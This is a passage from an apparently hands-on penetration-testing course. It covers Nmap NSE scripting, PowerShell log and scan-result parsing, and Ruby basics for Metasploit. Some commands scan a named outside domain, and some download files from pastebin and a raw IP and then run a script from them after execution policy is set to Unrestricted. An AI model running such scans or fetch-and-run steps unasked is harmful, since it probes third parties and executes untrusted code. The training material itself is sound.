  1713. return response.body
  1714. end
  1715.  
  1716. end
  1717. ----------------------------------------------------------------------
  1718.  
  1719. - Ok, now that we've made that change let's run the script
  1720. ---------------------------Type This-----------------------------------
  1721. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  1722. ----------------------------------------------------------------------
  1723.  
  1724.  
  1725.  
  1726.  
  1727.  
  1728.  
  1729.  
  1730.  
  1731. ---------------------------Type This-----------------------------------
  1732. sudo nano /usr/share/nmap/scripts/intro-nse.nse
  1733. ----------------------------------------------------------------------
  1734.  
  1735. ---------------------------Paste This into the file intro-nse.nse-----------------------------------
  1736. -- The Head Section --
  1737. local shortport = require "shortport"
  1738. local http = require "http"
  1739. local string = require "string"
  1740.  
  1741. -- The Rule Section --
  1742. portrule = shortport.http
  1743.  
  1744. -- The Action Section --
  1745. action = function(host, port)
  1746.  
  1747. local uri = "/installing-metasploit-in-ubunt/"
  1748. local response = http.get(host, port, uri)
  1749.  
  1750. if ( response.status == 200 ) then
  1751. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  1752. return title
  1753. end
  1754.  
  1755. end
  1756. ----------------------------------------------------------------------
  1757.  
  1758. - Ok, now that we've made that change let's run the script
  1759. ---------------------------Type This-----------------------------------
  1760. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  1761. ----------------------------------------------------------------------
  1762.  
  1763.  
  1764.  
  1765.  
  1766.  
  1767.  
  1768. ---------------------------Type This-----------------------------------
  1769. sudo nano /usr/share/nmap/scripts/intro-nse.nse
  1770. ----------------------------------------------------------------------
  1771.  
  1772. ---------------------------Paste This into the file intro-nse.nse-----------------------------------
  1773. -- The Head Section --
  1774. local shortport = require "shortport"
  1775. local http = require "http"
  1776. local string = require "string"
  1777.  
  1778. -- The Rule Section --
  1779. portrule = shortport.http
  1780.  
  1781. -- The Action Section --
  1782. action = function(host, port)
  1783.  
  1784. local uri = "/installing-metasploit-in-ubunt/"
  1785. local response = http.get(host, port, uri)
  1786.  
  1787. if ( response.status == 200 ) then
  1788. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  1789.  
  1790. if (title) then
  1791. return "Vulnerable"
  1792. else
  1793. return "Not Vulnerable"
  1794. end
  1795. end
  1796. end
  1797.  
  1798. ----------------------------------------------------------------------
  1799.  
  1800. - Ok, now that we've made that change let's run the script
  1801. ---------------------------Type This-----------------------------------
  1802. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  1803. ----------------------------------------------------------------------
  1804.  
  1805.  
  1806.  
  1807. #####################
  1808. # Powershell Basics #
  1809. #####################
  1810.  
  1811. PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
  1812.  
  1813. PowerShell file extension end in .ps1 .
  1814.  
  1815. An important note is that you cannot double click on a PowerShell script to execute it.
  1816.  
  1817. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  1818.  
  1819. ------------------------Type This------------------------------
  1820. cd c:\
  1821. dir
  1822. cd
  1823. ls
  1824. ---------------------------------------------------------------
  1825.  
  1826.  
  1827. To obtain a list of cmdlets, use the Get-Command cmdlet
  1828. ------------------------Type This------------------------------
  1829. Get-Command
  1830. ---------------------------------------------------------------
  1831.  
  1832.  
  1833. You can use the Get-Alias cmdlet to see a full list of aliased commands.
  1834. ------------------------Type This------------------------------
  1835. Get-Alias
  1836. ---------------------------------------------------------------
  1837.  
  1838.  
  1839. Don't worry you won't blow up your machine with Powershell
  1840. ------------------------Type This------------------------------
  1841. Get-Process | stop-process Don't press [ ENTER ] What will this command do?
  1842. Get-Process | stop-process -whatif
  1843. ---------------------------------------------------------------
  1844.  
  1845. To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
  1846. ------------------------Type This------------------------------
  1847. Get-Help Get-Command
  1848.  
  1849. Get-Help Get-Service –online
  1850.  
  1851. Get-Service -Name TermService, Spooler
  1852.  
  1853. Get-Service –N BITS
  1854. ---------------------------------------------------------------
  1855.  
  1856.  
  1857.  
  1858.  
  1859.  
  1860. - Run cmdlet through a pie and refer to its properties as $_
  1861. ------------------------Type This------------------------------
  1862. Get-Service | where-object { $_.Status -eq "Running"}
  1863. ---------------------------------------------------------------
  1864.  
  1865.  
  1866.  
  1867. - PowerShell variables begin with the $ symbol. First lets create a variable
  1868. ------------------------Type This------------------------------
  1869. $serv = Get-Service –N Spooler
  1870. ---------------------------------------------------------------
  1871.  
  1872. To see the value of a variable you can just call it in the terminal.
  1873. ------------------------Type This------------------------------
  1874. $serv
  1875.  
  1876. $serv.gettype().fullname
  1877. ---------------------------------------------------------------
  1878.  
  1879.  
  1880. Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
  1881. ------------------------Type This------------------------------
  1882. $serv | Get-Member
  1883.  
  1884. Get-Member -InputObject $serv
  1885. ---------------------------------------------------------------
  1886.  
  1887.  
  1888.  
  1889.  
  1890. Let's use a method and a property with our object.
  1891. ------------------------Type This------------------------------
  1892. $serv.Status
  1893. $serv.Stop()
  1894. $serv.Refresh()
  1895. $serv.Status
  1896. $serv.Start()
  1897. $serv.Refresh()
  1898. $serv.Status
  1899. ---------------------------------------------------------------
  1900.  
  1901.  
  1902. If you want some good command-line shortcuts you can check out the following link:
  1903. https://technet.microsoft.com/en-us/library/ff678293.aspx
  1904.  
  1905. #############################
  1906. # Simple Event Log Analysis #
  1907. #############################
  1908.  
  1909. Step 1: Dump the event logs
  1910. ---------------------------
  1911. The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
  1912.  
  1913. To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
  1914. If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
  1915. ------------------------Type This------------------------------
  1916. Get-EventLog -LogName application | Export-Clixml Applog.xml
  1917.  
  1918. type .\Applog.xml
  1919.  
  1920. $logs = "system","application","security"
  1921. ---------------------------------------------------------------
  1922.  
  1923.  
  1924. The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
  1925. ------------------------Type This------------------------------
  1926. $logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
  1927. ---------------------------------------------------------------
  1928.  
  1929.  
  1930.  
  1931.  
  1932. Step 2: Import the event log of interest
  1933. ----------------------------------------
  1934. To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
  1935. Store the results in a variable.
  1936. Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
  1937.  
  1938. The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
  1939. ------------------------Type This------------------------------
  1940. $seclog = Import-Clixml security.xml
  1941.  
  1942. $seclog | select -Last 5
  1943. ---------------------------------------------------------------
  1944.  
  1945. Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
  1946. ------------------------Type This------------------------------
  1947. Get-EventLog Application -After (Get-Date).AddDays(-1)
  1948. ---------------------------------------------------------------
  1949. You can use '-after' and '-before' to filter date ranges
  1950.  
  1951. One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
  1952. By default, an ordinary user does not have permission to read the security log.
  1953.  
  1954.  
  1955.  
  1956.  
  1957. Step 3: Drill into a specific entry
  1958. -----------------------------------
  1959. To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
  1960.  
  1961. ------------------------Type This------------------------------
  1962. $seclog | select -first 1 | fl *
  1963. ---------------------------------------------------------------
  1964.  
  1965. The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
  1966.  
  1967. ------------------------Type This------------------------------
  1968. ($seclog | select -first 1).message
  1969.  
  1970. (($seclog | select -first 1).message).gettype()
  1971. ---------------------------------------------------------------
  1972.  
  1973.  
  1974. In the *nix world you often want a count of something (wc -l).
  1975. How often is the SeSecurityPrivilege privilege mentioned in the message property?
  1976. To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
  1977. ------------------------Type This------------------------------
  1978. $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
  1979. ---------------------------------------------------------------
  1980. If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
  1981.  
  1982. ------------------------Type This------------------------------
  1983. $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
  1984. ---------------------------------------------------------------
  1985.  
  1986. Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
  1987. Use the count property to determine the total number of entries in the event log.
  1988. ------------------------Type This------------------------------
  1989. $seclog.Count
  1990. ---------------------------------------------------------------
  1991.  
  1992.  
  1993.  
  1994.  
  1995.  
  1996. ############################
  1997. # Simple Log File Analysis #
  1998. ############################
  1999.  
  2000.  
  2001. You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
  2002.  
  2003. ------------------------Type This------------------------------
  2004. mkdir c:\ps
  2005. cd c:\ps
  2006. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
  2007. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
  2008. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
  2009. ---------------------------------------------------------------
  2010.  
  2011.  
  2012.  
  2013. The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
  2014. ------------------------Type This------------------------------
  2015. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
  2016. ---------------------------------------------------------------
  2017.  
  2018.  
  2019.  
  2020. To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
  2021. ------------------------Type This------------------------------
  2022. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
  2023. ---------------------------------------------------------------
  2024.  
  2025.  
  2026. To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
  2027. ------------------------Type This------------------------------
  2028. Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
  2029. ---------------------------------------------------------------
  2030.  
  2031.  
  2032. Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
  2033. ------------------------Type This------------------------------
  2034. Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
  2035. ---------------------------------------------------------------
  2036.  
  2037. In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
  2038. This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
  2039. ------------------------Type This------------------------------
  2040. Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
  2041. ---------------------------------------------------------------
  2042.  
  2043.  
  2044.  
  2045. ##############################################
  2046. # Parsing Log files using windows PowerShell #
  2047. ##############################################
  2048.  
  2049. Download the sample IIS log http://pastebin.com/LBn64cyA
  2050.  
  2051. ------------------------Type This------------------------------
  2052. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
  2053.  
  2054. Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
  2055. ---------------------------------------------------------------
  2056.  
  2057.  
  2058. The above command would give us all the WebDAV requests.
  2059.  
  2060. To filter this to a particular user name, use the below command:
  2061. ------------------------Type This------------------------------
  2062. Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
  2063. ---------------------------------------------------------------
  2064.  
  2065.  
  2066. Some more options that will be more commonly required :
  2067.  
  2068. For Outlook Web Access : Replace WebDAV with OWA
  2069.  
  2070. For EAS : Replace WebDAV with Microsoft-server-activesync
  2071.  
  2072. For ECP : Replace WebDAV with ECP
  2073.  
  2074.  
  2075.  
  2076.  
  2077.  
  2078.  
  2079.  
  2080. ####################################################################
  2081. # Windows PowerShell: Extracting Strings Using Regular Expressions #
  2082. ####################################################################
  2083.  
  2084.  
  2085. Regex Characters you might run into:
  2086.  
  2087. ^ Start of string, or start of line in a multiline pattern
  2088. $ End of string, or start of line in a multiline pattern
  2089. \b Word boundary
  2090. \d Digit
  2091. \ Escape the following character
  2092. * 0 or more {3} Exactly 3
  2093. + 1 or more {3,} 3 or more
  2094. ? 0 or 1 {3,5} 3, 4 or 5
  2095.  
  2096.  
  2097.  
  2098. To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
  2099.  
  2100. 1) The input file that will be parsed
  2101. ------------------------Type This------------------------------
  2102. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
  2103. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
  2104. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
  2105. ---------------------------------------------------------------
  2106. 2) The regular expression that the input file will be compared against
  2107.  
  2108. 3) The output file for where the extracted data will be placed.
  2109.  
  2110. Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
  2111. Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
  2112.  
  2113. To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
  2114. ------------------------Type This------------------------------
  2115. $input_path = 'c:\ps\emails.txt'
  2116. $output_file = 'c:\ps\extracted_addresses.txt'
  2117. $regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
  2118. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
  2119. ---------------------------------------------------------------
  2120.  
  2121.  
  2122. In this script, we have the following variables:
  2123.  
  2124. 1) $input_path to hold the path to the input file we want to parse
  2125.  
  2126. 2) $output_file to hold the path to the file we want the results to be stored in
  2127.  
  2128. 3) $regex to hold the regular expression pattern to be used when the strings are being matched.
  2129.  
  2130. The select-string cmdlet contains various parameters as follows:
  2131.  
  2132. 1) "-Path" which takes as input the full path to the input file
  2133.  
  2134. 2) "-Pattern" which takes as input the regular expression used in the matching process
  2135.  
  2136. 3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
  2137.  
  2138. Using ">" the results are written to the destination specified in the $output_file variable.
  2139.  
  2140. Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
  2141.  
  2142. IP addresses
  2143. ------------
  2144. For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
  2145. ------------------------Type This------------------------------
  2146. $input_path = 'c:\ps\ip_addresses.txt'
  2147. $output_file = 'c:\ps\extracted_ip_addresses.txt'
  2148. $regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
  2149. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
  2150. ---------------------------------------------------------------
  2151.  
  2152.  
  2153.  
  2154. URLs
  2155. ----
  2156. For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
  2157. You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
  2158. ------------------------Type This------------------------------
  2159. $input_path = 'c:\ps\URL_addresses.txt'
  2160. $output_file = 'c:\ps\extracted_URL_addresses.txt'
  2161. $regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
  2162. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
  2163. ---------------------------------------------------------------
  2164.  
  2165. In addition to the examples above, many other types of strings can be extracted using this script.
  2166. All you need to do is switch the regular expression in the "$regex" variable!
  2167. In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
  2168.  
  2169.  
  2170.  
  2171. ##########################
  2172. # Parsing Nmap XML Files #
  2173. ##########################
  2174. If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
  2175. http://45.63.104.73/PowerShell-Files.zip
  2176.  
  2177.  
  2178.  
  2179.  
  2180. Run Powershell as administrator
  2181. ------------------------Type This------------------------------
  2182. cd C:\ps\
  2183.  
  2184. Get-ExecutionPolicy
  2185. Set-ExecutionPolicy Unrestricted –Force
  2186. ---------------------------------------------------------------
  2187.  
  2188.  
  2189. Parse nmap XML
  2190. ------------------------Type This------------------------------
  2191. .\parse-nmap.ps1 samplescan.xml
  2192. ---------------------------------------------------------------
  2193.  
  2194.  
  2195. Process all XML files
  2196. ------------------------Type This------------------------------
  2197. .\parse-nmap.ps1 *.xml
  2198. ---------------------------------------------------------------
  2199.  
  2200. Piping also works
  2201. ------------------------Type This------------------------------
  2202. dir *.xml | .\parse-nmap.ps1
  2203. ---------------------------------------------------------------
  2204.  
  2205. Advanced parsing with filtering conditions
  2206. ------------------------Type This------------------------------
  2207. .\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
  2208. ---------------------------------------------------------------
  2209.  
  2210.  
  2211. More parsing
  2212. ------------------------Type This------------------------------
  2213. .\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
  2214. ---------------------------------------------------------------
  2215.  
  2216. Parsing with match and multiple conditions
  2217. ------------------------Type This------------------------------
  2218. .\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
  2219. ---------------------------------------------------------------
  2220.  
  2221.  
  2222. CSV Export
  2223. ------------------------Type This------------------------------
  2224. .\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
  2225. ---------------------------------------------------------------
  2226.  
  2227. Import Data from CSV
  2228. ------------------------Type This------------------------------
  2229. $data = import-csv weblisteners.csv
  2230. $data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
  2231. ---------------------------------------------------------------
  2232.  
  2233.  
  2234. Export to HTML
  2235. ------------------------Type This------------------------------
  2236. .\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
  2237. ---------------------------------------------------------------
  2238.  
  2239.  
  2240. ########################################
  2241. # Parsing Nessus scans with PowerShell #
  2242. ########################################
  2243. If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
  2244. http://45.63.104.73/PowerShell-Files.zip
  2245.  
  2246.  
  2247.  
  2248. Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
  2249. ------------------------Type This------------------------------
  2250. Import-Csv C:\ps\class_nessus.csv | Get-Member
  2251. ---------------------------------------------------------------
  2252.  
  2253. filter the objects:
  2254.  
  2255. ------------------------Type This------------------------------
  2256. Import-Csv C:\ps\class_nessus.csv | where {$_.risk -eq "high"}
  2257. ---------------------------------------------------------------
  2258.  
  2259. use the Select-Object cmdlet and only get unique entries:
  2260. ------------------------Type This------------------------------
  2261. Import-Csv C:\ps\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
  2262.  
  2263. Import-Csv C:\ps\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
  2264. ------------------------Type This------------------------------
  2265.  
  2266. ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
  2267. ------------------------Type This------------------------------
  2268. Import-Csv C:\ps\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
  2269. ---------------------------------------------------------------
  2270.  
  2271.  
  2272.  
  2273.  
  2274. #################################################
  2275. # Ruby Fundamentals and Metasploit Architecture #
  2276. #################################################
  2277.  
  2278. ############################
  2279. # Day 4: Ruby Fundamentals #
  2280. ############################
  2281.  
  2282.  
  2283.  
  2284. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  2285. scientist and programmer from Japan. It is a cross-platform dynamic language.
  2286.  
  2287. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  2288. on Rails is a framework that is written in Ruby.
  2289.  
  2290. - Ruby's file name extensions are .rb and .rbw.
  2291.  
  2292. - official website of this
  2293.  
  2294. - language: www.ruby-lang.org.
  2295.  
  2296.  
  2297. - interactive Shell called Ruby Shell
  2298.  
  2299.  
  2300. - Installing and Running IRB
  2301.  
  2302. ---------------------------Type This-----------------------------------
  2303. ruby -v
  2304. -----------------------------------------------------------------------
  2305.  
  2306.  
  2307. If you don't have ruby2.3 use the commands below:
  2308. -----------------------------------------------------------------------
  2309. sudo apt-get install ruby2.3 ruby2.3-dev ruby2.3-doc irb rdoc ri
  2310. -----------------------------------------------------------------------
  2311.  
  2312. - open up the interactive console and play around.
  2313.  
  2314. ---------------------------Type This-----------------------------------
  2315. irb
  2316. -----------------------------------------------------------------------
  2317.  
  2318.  
  2319. - Math, Variables, Classes, Creating Objects and Inheritance
  2320.  
  2321.  
  2322. The following arithmetic operators:
  2323. Addition operator (+) — 10 + 23
  2324. Subtraction operator (-) — 1001 - 34
  2325. Multiplication operator (*) — 5 * 5
  2326. Division operator (/) — 12 / 2
  2327.  
  2328.  
  2329.  
  2330. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  2331. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  2332. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  2333.  
  2334. ---------------------------Type This-----------------------------------
  2335. x = 25
  2336. x + 30
  2337. y = 69
  2338. y+33
  2339. -----------------------------------------------------------------------
  2340.  
  2341.  
  2342.  
  2343. - Let's look at creating classes and creating objects.
  2344.  
  2345. - Here, the name of the class is Attack. An object has its properties and methods.
  2346.  
  2347.  
  2348. ---------------------------Type This-----------------------------------
  2349. class Attack
  2350. attr_accessor :of, :sqli, :xss
  2351. end
  2352. -----------------------------------------------------------------------
  2353.  
  2354.  
  2355. What is nil?
  2356. Reference:
  2357. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  2358.  
  2359. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  2360.  
  2361. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  2362.  
  2363. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  2364.  
  2365.  
  2366.  
  2367.  
  2368.  
  2369. # Now that we have created the classes let's create the objects
  2370. ---------------------------Type This-----------------------------------
  2371. first_attack = Attack.new
  2372. first_attack.of = "stack"
  2373. first_attack.sqli = "blind"
  2374. first_attack.xss = "dom"
  2375. puts first_attack.of
  2376. puts first_attack.sqli
  2377. puts first_attack.xss
  2378. -----------------------------------------------------------------------
  2379.  
  2380.  
  2381.  
  2382.  
  2383. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  2384. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  2385. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  2386. programming life easier by maximizing code reuse.
  2387.  
  2388.  
  2389. ---------------------------Type This-----------------------------------
  2390. class Exploitframeworks
  2391. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  2392. end
  2393. class Metasploit < Exploitframeworks
  2394. end
  2395. class Canvas < Exploitframeworks
  2396. end
  2397. class Coreimpact < Exploitframeworks
  2398. end
  2399. class Saint < Exploitframeworks
  2400. end
  2401. class Exploitpack < Exploitframeworks
  2402. end
  2403. -----------------------------------------------------------------------
  2404.  
  2405.  
  2406.  
  2407.  
  2408. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  2409.  
  2410. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  2411.  
  2412. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  2413. it will print this string: "We are Learning how to PenTest"
  2414.  
  2415. - An object named 'bo' is created, which is used to call the method.
  2416.  
  2417.  
  2418. ---------------------------Type This-----------------------------------
  2419. class Msfnl
  2420. def learning
  2421. puts "We are Learning how to PenTest"
  2422. end
  2423. end
  2424. -----------------------------------------------------------------------
  2425.  
  2426. #Now let's define an object for our Method
  2427.  
  2428. ---------------------------Type This-----------------------------------
  2429. joe = Msfnl.new
  2430. joe.learning
  2431. -----------------------------------------------------------------------
  2432.  
  2433.  
  2434.  
  2435. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  2436. calling the puts() function, we are sending a string value to the function. This string value is used by the
  2437. function to perform some particular operations.
  2438.  
  2439. puts ("Pentesting")
  2440.  
  2441.  
  2442. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  2443. explain some useful string functions with an example.
  2444.  
  2445. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  2446. reverse function reverses a string. The following example demonstrates how to use the string functions.
  2447.  
  2448. ---------------------------Type This-----------------------------------
  2449. 55.class
  2450. "I Love Programming".class
  2451. "I Love Pentesting".length
  2452. "Pown that box".upcase
  2453. "Love" + "To Root Boxes"
  2454. "evil".reverse
  2455. "evil".reverse.upcase
  2456. -----------------------------------------------------------------------
  2457.  
  2458.  
  2459. - expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
  2460. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
  2461. examples of some expressions.
  2462.  
  2463. ---------------------------Type This-----------------------------------
  2464. a = 3
  2465. b = 6
  2466. a+b+20
  2467. d = 44
  2468. f = d
  2469. puts f
  2470. -----------------------------------------------------------------------
  2471.  
  2472.  
  2473.  
  2474.  
  2475.  
  2476. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  2477. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  2478. statements to understand the shortcuts.
  2479.  
  2480. ---------------------------Type This-----------------------------------
  2481. g = 70
  2482. g = g+44
  2483. g += 33
  2484. -----------------------------------------------------------------------
  2485.  
  2486.  
  2487. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  2488.  
  2489.  
  2490.  
  2491. ---------------------------Type This-----------------------------------
  2492. g *= 3
  2493. -----------------------------------------------------------------------
  2494.  
  2495.  
  2496. - In the above statement, g is multiplied with 3 and then assigned to g.
  2497.  
  2498. - Example
  2499.  
  2500. - Comparison Operators, Loops, Data Types, and Constants
  2501.  
  2502. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  2503. how to use the following comparison operators.
  2504.  
  2505. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  2506. variable or constant. If it's less than the other, the 'less than' operator returns true.
  2507.  
  2508. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  2509. or constant. If it's equal to the other, the 'equal to' operator returns true.
  2510.  
  2511. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  2512. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  2513.  
  2514. ---------------------------Type This-----------------------------------
  2515. numberofports = 55
  2516. puts "number of ports found during scan" if numberofports < 300
  2517. numberofports = 400
  2518. puts "number of ports found during scan" if numberofports < 300
  2519. puts "number of ports found during scan" if numberofports == 300
  2520. puts "number of ports found during scan" if numberofports != 300
  2521. -----------------------------------------------------------------------
  2522.  
  2523.  
  2524.  
  2525. Example
  2526.  
  2527.  
  2528. - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
  2529.  
  2530. - This operator is generally used to combine multiple conditions.
  2531. - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
  2532.  
  2533. - following example to understand how this operator works.
  2534.  
  2535. ---------------------------Type This-----------------------------------
  2536. ports = 100
  2537. puts "number of ports found on the network" if ports<100 || ports>200
  2538. puts "number of ports found on the network" if ports<100 || ports>75
  2539. -----------------------------------------------------------------------
  2540.  
  2541. # unless
  2542.  
  2543. ---------------------------Type This-----------------------------------
  2544. portsbelow1024 = 50
  2545. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  2546. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  2547. puts "If the ports are below 1024" unless portsbelow1024 < 20
  2548. -----------------------------------------------------------------------
  2549.  
  2550. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  2551.  
  2552.  
  2553.  
  2554. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  2555.  
  2556. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  2557.  
  2558. ---------------------------Type This-----------------------------------
  2559. 10.times do puts "infosecaddicts" end
  2560. -----------------------------------------------------------------------
  2561.  
  2562. # Or use the curly braces
  2563.  
  2564. ---------------------------Type This-----------------------------------
  2565. 10.times {puts "infosecaddicts"}
  2566. -----------------------------------------------------------------------
